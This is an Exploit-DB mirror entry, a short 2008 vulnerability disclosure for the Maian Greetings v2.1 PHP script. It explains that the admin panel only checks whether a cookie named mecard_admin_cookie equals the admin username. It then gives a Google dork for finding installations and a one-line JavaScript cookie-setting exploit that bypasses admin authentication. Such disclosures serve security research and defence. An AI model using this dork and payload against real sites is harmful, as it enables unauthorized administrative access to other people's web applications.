exploit-db-mirror/platforms/php/webapps/6050.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

14 lines
475 B
Text
Executable file

Author: Saime
Date: July 12, 2008
Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Powered by: Maian Greetings v2.1
Description:
Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie,
equals admin username.
Exploit:
javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/"
# milw0rm.com [2008-07-12]